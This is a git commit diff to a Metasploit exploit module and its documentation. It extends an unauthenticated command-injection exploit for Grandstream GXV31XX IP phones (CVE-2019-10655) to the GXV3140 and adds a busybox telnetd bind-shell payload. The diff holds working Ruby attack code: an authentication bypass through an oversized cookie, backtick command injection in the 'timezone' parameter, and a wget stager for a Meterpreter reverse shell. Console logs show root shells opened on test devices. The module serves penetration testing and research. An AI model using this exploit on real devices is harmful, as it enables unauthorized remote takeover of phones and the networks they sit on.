Add support for GXV3140 models and ARCH_CMD busybox telnetd payload

bcoles · bcoles · commit feebf25ad4df · 2022-01-29T19:38:57.000Z
diff --git a/documentation/modules/exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec.md b/documentation/modules/exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec.md
@@ -1,21 +1,23 @@
 ## Vulnerable Application
 
-This module exploits a command injection vulnerability in Grandstream GXV3175
+This module exploits a command injection vulnerability in Grandstream GXV31XX
 IP multimedia phones. The 'settimezone' action does not validate input in the
 'timezone' parameter allowing injection of arbitrary commands.
 
 A buffer overflow in the 'phonecookie' cookie parsing allows authentication
 to be bypassed by providing an alphanumeric cookie 93 characters in length.
 
-This module was tested successfully on Grandstream GXV3175v2
-hardware revision V2.6A with firmware version 1.0.1.19.
+This module was tested successfully on Grandstream models:
+
+* GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19; and
+* GXV3140 hardware revision V0.4B with firmware version 1.0.1.27.
 
 ## Verification Steps
 
 1. `msfconsole`
-1. `use exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec`
+1. `use exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec`
 1. `set rhosts [IP]`
-1. `set lhost [IP]`
+1. `set target [target]`
 1. `run`
 1. You should get a session
 
@@ -24,14 +26,43 @@ hardware revision V2.6A with firmware version 1.0.1.19.
 
 ## Scenarios
 
+### Grandstream GXV3140
+
+```
+msf6 > use exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set rhosts 10.1.1.111
+rhosts => 10.1.1.111
+msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > run
+
+[*] Started bind TCP handler against 10.1.1.111:4444
+[*] Command shell session 1 opened (10.1.1.112:36769 -> 10.1.1.111:4444 ) at 2022-01-29 02:30:13 -0500
+
+
+Shell Banner:
+_!_
+-----
+
+
+/ # uname -a
+uname -a
+Linux gxv3140_000b8229ac36 2.6.10_gxv31xx #15 Tue Jul 16 11:07:04 CDT 2013 armv5tejl unknown
+/ #
+
+```
+
+### Grandstream GXV3175v2
+
 ```
-msf6 > use exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec 
+msf6 > use exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec
 [*] Using configured payload linux/armle/meterpreter_reverse_tcp
-msf6 exploit(linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec) > set rhosts 10.1.1.109
+msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set rhosts 10.1.1.109
 rhosts => 10.1.1.109
-msf6 exploit(linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec) > set lhost 10.1.1.110 
+msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set lhost 10.1.1.110
 lhost => 10.1.1.110
-msf6 exploit(linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec) > run
+msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set target 1
+target => 1
+msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > run
 
 [*] Started reverse TCP handler on 10.1.1.110:4444 
 [*] Using URL: http://0.0.0.0:8080/JF62dexHKN8b
diff --git a/modules/exploits/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec.rb b/modules/exploits/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec.rb
@@ -8,32 +8,36 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::Deprecated
+
+  moved_from 'exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec'
 
   HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",
+        'Name' => "Grandstream GXV31XX 'settimezone' Unauthenticated Command Execution",
         'Description' => %q{
-          This module exploits a command injection vulnerability in Grandstream GXV3175
+          This module exploits a command injection vulnerability in Grandstream GXV31XX
           IP multimedia phones. The 'settimezone' action does not validate input in the
           'timezone' parameter allowing injection of arbitrary commands.
 
           A buffer overflow in the 'phonecookie' cookie parsing allows authentication
           to be bypassed by providing an alphanumeric cookie 93 characters in length.
 
-          This module was tested successfully on Grandstream GXV3175v2
-          hardware revision V2.6A with firmware version 1.0.1.19.
+          This module was tested successfully on Grandstream models:
+          GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19; and
+          GXV3140 hardware revision V0.4B with firmware version 1.0.1.27.
         },
         'Author' => [
           'alhazred', # Command injection vulnerability discovery and exploit
           'Brendan Scarvell', # Auth bypass discovery
           'bcoles' # Metasploit
         ],
         'License' => MSF_LICENSE,
-        'Platform' => 'linux',
+        'Platform' => %w[unix linux],
         'References' => [
           [ 'CVE', '2019-10655' ],
           [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],
@@ -46,30 +50,47 @@ def initialize(info = {})
         },
         'DisclosureDate' => '2016-09-01',
         'Privileged' => true,
-        'Arch' => ARCH_ARMLE,
-        'DefaultOptions' => {
-          'PrependFork' => true,
-          'MeterpreterTryToFork' => true,
-          'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
-          'CMDSTAGER::FLAVOR' => 'wget'
-        },
         'CmdStagerFlavor' => %w[wget],
         'Targets' => [
-          ['Automatic', {}]
+          [
+            'Linux (cmd)', {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd'
+              }
+            }
+          ],
+          [
+            'Linux (ARMLE)', {
+              'Arch' => ARCH_ARMLE,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PrependFork' => true,
+                'MeterpreterTryToFork' => true,
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
+                'CMDSTAGER::FLAVOR' => 'wget'
+              }
+            }
+          ],
         ],
         'DefaultTarget' => 0
       )
     )
   end
 
-  def check
-    res = send_request_cgi(
+  def send_manager_request(vars_get)
+    send_request_cgi(
       'uri' => '/manager',
       'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
-      'vars_get' => {
-        'action' => 'settimezone',
-        'timezone' => ''
-      }
+      'vars_get' => vars_get
+    )
+  end
+
+  def check
+    res = send_manager_request(
+      'action' => 'settimezone',
+      'timezone' => ''
     )
 
     if res && res.code == 200 && res.body.to_s.include?('Response=Success')
@@ -79,14 +100,10 @@ def check
     CheckCode::Safe
   end
 
-  def execute_command(cmd, _opts)
-    res = send_request_cgi(
-      'uri' => '/manager',
-      'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
-      'vars_get' => {
-        'action' => 'settimezone',
-        'timezone' => "`#{cmd}`"
-      }
+  def execute_command(cmd, _opts = {})
+    res = send_manager_request(
+      'action' => 'settimezone',
+      'timezone' => "`#{cmd}`"
     )
     unless res
       fail_with(Failure::Unreachable, 'Connection failed')
@@ -100,9 +117,13 @@ def execute_command(cmd, _opts)
   end
 
   def exploit
-    execute_cmdstager(
-      linemax: 220, # 255 minus URL encoding
-      background: true
-    )
+    if target.arch.first == ARCH_CMD
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(
+        linemax: 220, # 255 minus URL encoding
+        background: true
+      )
+    end
   end
 end
